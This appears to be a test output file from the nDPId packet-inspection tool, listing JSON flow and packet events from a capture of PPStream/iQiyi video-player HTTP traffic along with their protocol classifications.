-01370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1467353139050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":744,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":744,"pkt_l4_len":710,"thread_ts_msec":1467353139050,"pkt":"ABxCjnAxTF4M6gNlCABFAALaH2hAAC0GDFd7fXAxwKhzCABQxSD7GtiHFHbNKVAYADhuxwAASFRUUC8xLjEgMzAyIEZvdW5kDQpMb2NhdGlvbjogaHR0cHM6Ly95b3V0dS5iZS85b3ZjSndDN0FFYw0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLSUQ9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IFBhdGg9LzsgRG9tYWluPWhtLmJhaWR1LmNvbTsgRXhwaXJlcz1GcmksIDAxIEp1bCAyMDE2IDA2OjM1OjM4IEdNVA0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLTE9HPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBQYXRoPS87IERvbWFpbj1obS5iYWlkdS5jb207IEV4cGlyZXM9RnJpLCAwMSBKdWwgMjAxNiAwNjozNTozOCBHTVQNClAzUDogQ1A9IkNVUmEgQURNYSBERVZhIFBTQW8gUFNEbyBPVVIgQlVTIFVOSSBQVVIgSU5UIERFTSBTVEEgUFJFIENPTSBOQVYgT1RDIE5PSSBEU1AgQ09SIg0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KU2VydmVyOiBhcGFjaGUNCg0K"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1467353139305,"pkt":"TF4M6gNlABxCjnAxCABFAAEKA4dAAIAGQVvAqHMIy0K2GMUiAFDWCs3i1IWCxVAYAQQdEwAAR0VUIC9vY3NwL01Fa3dSekJGTUVNd1FUQUpCZ1VyRGdNQ0dnVUFCQlR5NEdyNWhZb2RqWENiU1JramVxbTFHaWglMkJaQVFVU3QwR0ZodTg5bWkxZHZXQnRydGlHcnBhZ1M4Q0NFWXJGWGtxMnVneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IE1pY3Jvc29mdC1DcnlwdG9BUEkvNi4xDQpIb3N0OiBjbGllbnRzMS5nb29nbGUuY29tDQoNCg=="} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} -01465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1467353139309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":813,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":813,"pkt_l4_len":779,"thread_ts_msec":1467353139309,"pkt":"ABxCjnAxTF4M6gNlCABFAAMfaWMAAD0GXGrLQrYYwKhzCABQxSLUhYLF1grOxFAYAO2vKAAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jc3AtcmVzcG9uc2UNCkRhdGU6IFR1ZSwgMjggSnVuIDIwMTYgMTc6MzQ6NDkgR01UDQpFeHBpcmVzOiBTYXQsIDAyIEp1bCAyMDE2IDE3OjM0OjQ5IEdNVA0KU2VydmVyOiBvY3NwX3Jlc3BvbmRlcg0KQ29udGVudC1MZW5ndGg6IDQ2Mw0KWC1YU1MtUHJvdGVjdGlvbjogMTsgbW9kZT1ibG9jaw0KWC1GcmFtZS1PcHRpb25zOiBTQU1FT1JJR0lODQpBZ2U6IDIxNzg0OQ0KQ2FjaGUtQ29udHJvbDogcHVibGljLCBtYXgtYWdlPTM0NTYwMA0KDQowggHLCgEAoIIBxDCCAcAGCSsGAQUFBzABAQSCAbEwggGtMIGWohYEFErdBhYbvPZotXb1gba7Yhq6WoEvGA8yMDE2MDYyODA3MDAxN1owazBpMEEwCQYFKw4DAhoFAAQU8uBq+YWKHY1wm0kZI3qptRoofmQEFErdBhYbvPZotXb1gba7Yhq6WoEvAghGKxV5KtroM4AAGA8yMDE2MDYyODA3MDAxN1qgERgPMjAxNjA3MDUwNzAwMTdaMA0GCSqGSIb3DQEBCwUAA4IBAQBKs877cfA5B2KGhwFSvIyUBYVxkUFjApJpIKog7zezUT4uRPAvbjktL\/Ds15nk8Y2Znhsf4SdVmf8GlloCQ6IXimfBklwRGn8\/72t77ZQLcabmXBFNBqyfqmRrW1O7lFh1alLxLnbN6PNKIPNv7dkTJVq4NRpJC1H3sykeA3XbH5EEaxhdvWFd1bsvybTiEgn7Bn5bpdXlExvoxRYuc7MLXQAUHRWSGKZpv+UniRokZRHgZy2GbGkQE8sf0PVCXrNjm4qsIXnQvqrF2J2xxFQ5x1wzU7J9l9Av+bPvuQI2mdLqvQskYq3tOxhJ6prFG9fcqt4lJS5E11mkG9tPXiAq"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":629,"pkt_l4_len":595,"thread_ts_msec":1467353139505,"pkt":"TF4M6gNlABxCjnAxCABFAAJnA5RAAIAG6ATAqHMIymwO28UjAFBUZatTb7o85VAYAQQGIwAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRzdGFydCZzdGFydHRtPTEwOTcmcmVzZXQ9MSZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMTkmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1467353139595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139595,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uuZAADMGf2DKbA7bwKhzCABQxSNvujzlVGWtklAYADcmHAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":573,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":573,"pkt_l4_len":539,"thread_ts_msec":1467353139627,"pkt":"TF4M6gNlABxCjnAxCABFAAIvA51AAIAG6DPAqHMIymwO28UlAFD7uSUWcC90rlAYAQQTNwAAR0VUIC9jb3JlP3Q9NSZhPTImcmE9MSZwZj0yMDEmcD0xMSZwMT0xMTQmcDI9MzAwMCZzZGt0cD0xJmMxPTMxJnI9NDc5NTMxMDAwJmFpZD0xODA5MzIzMDEmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9V2luZG93cyUyMDcmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMzkmaXNsb2NhbD0wJmFzPTAzMTFjNWEwZDU1OTYwNjNkYjU5NDRiZDc2YjZjYmZmJnZlPWIxZjkwZjhkYTZmZTAyNThkMTM2MTZhODA3MGNiOTk3JnBlPSZ2ZnJtPSZjaGw9JmhjZG52PTEwLjAuMC4yOTMmdHBjZD0wJmlzZHJtPTEmaHQ9MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":424,"pkt_l4_len":390,"thread_ts_msec":1467353139662,"pkt":"TF4M6gNlABxCjnAxCABFAAGaA59AAIAG6LXAqHMIymwO7MUmAFBtzkRVA7NFyFAYAQQzoQAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmYT0zNCZjdD1vbmNsaWNrJnR5cGU9cGMmYXM9JmNsdD1wY19wbGF5X3BsYXllcl9jbGljayZtdj01LjIuMTUuMjI0MCZwdT0mcm49MEZFMTcyRUM0NEM0NEI4NkFFRURFNTRBQTAwNTQxQzQ1NzQwNiZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9Mi4wLjEwMi4zMDE0NyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1467353139771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353139771,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0y0pAADMGbvDKbA7swKhzCABQxSYDs0XIbc5Fx1AYAB\/3XQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1467353139779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139779,"pkt":"ABxCjnAxTF4M6gNlCABFAAC58h9AADMGSCfKbA7bwKhzCABQxSVwL3Su+7knHVAYADbM\/QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":952,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":952,"pkt_l4_len":918,"thread_ts_msec":1467353139819,"pkt":"TF4M6gNlABxCjnAxCABFAAOqA7FAAIAG5pPAqHMIymwO7MUnAFCB65R9kZemalAYQTdERQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9MXx8NzEwMDAwMDF8fDUwMDAwMDA4NTg4NzR8fDUwMDAwMDA5Mjc1NTh8fHJvbGwmYXM9JmF2PTQuMTAuMDA0JmI9MTgwOTMyMzAxJmM9MzEmY3Q9JmQ9MjE3NSZkaT0mZHA9JmU9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPSZvaT0mcD10JnBwPSZyYz0tMSZyZD05MiZyaT0mcz0xNDY3MzUzMTM4MDQzJnNoPSZzcT0mc3c9JnQ9cyZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1467353139866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139866,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5KWZAADMGENDKbA7swKhzCABQxSeRl6ZqgeuX\/1AYACHEyQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1100,"pkt_l4_len":1066,"thread_ts_msec":1467353140628,"pkt":"TF4M6gNlABxCjnAxCABFAAQ+A+YAAIAGJdrAqHMIymwO3cUqAFDSWIZQbAIVvVAYKACmwAAAR0VUIC9iP2MxPTYmczE9MSZtYWNpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZjaGFubmVsaWQ9MDAwJm51PSZlPTEzNTI1Mjgmc2U9MTI1MzgxMSZyPTUwMDQ5NDYwMCZhZHVpZD1kMDdkZmQzMGYwZWU0ZTQ4YmJjYWYxMjA4Yzc1ODQ3MSZjdG09MTM3NTIxMSZwbGF5c291cmNlPTAwMTAwNDAwMCZ2aWQ9NTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEmYWxidW1pZD01MDA0OTQ2MDAmcmE9MiZ0ZD0yMjY1MiZzdWNjZXNzaW9uPTQmdHlwZT0xJnZmcm09My0wMDEwMDQwMDAtY19jb3JnaS0wJmJ1Y2tldD1jX2NvcmdpX21haW4mcmF0cD0xJnBsYXltb2RlPTEmaHU9LTEmaHQ9MCZhcD0wJnQ9MjAx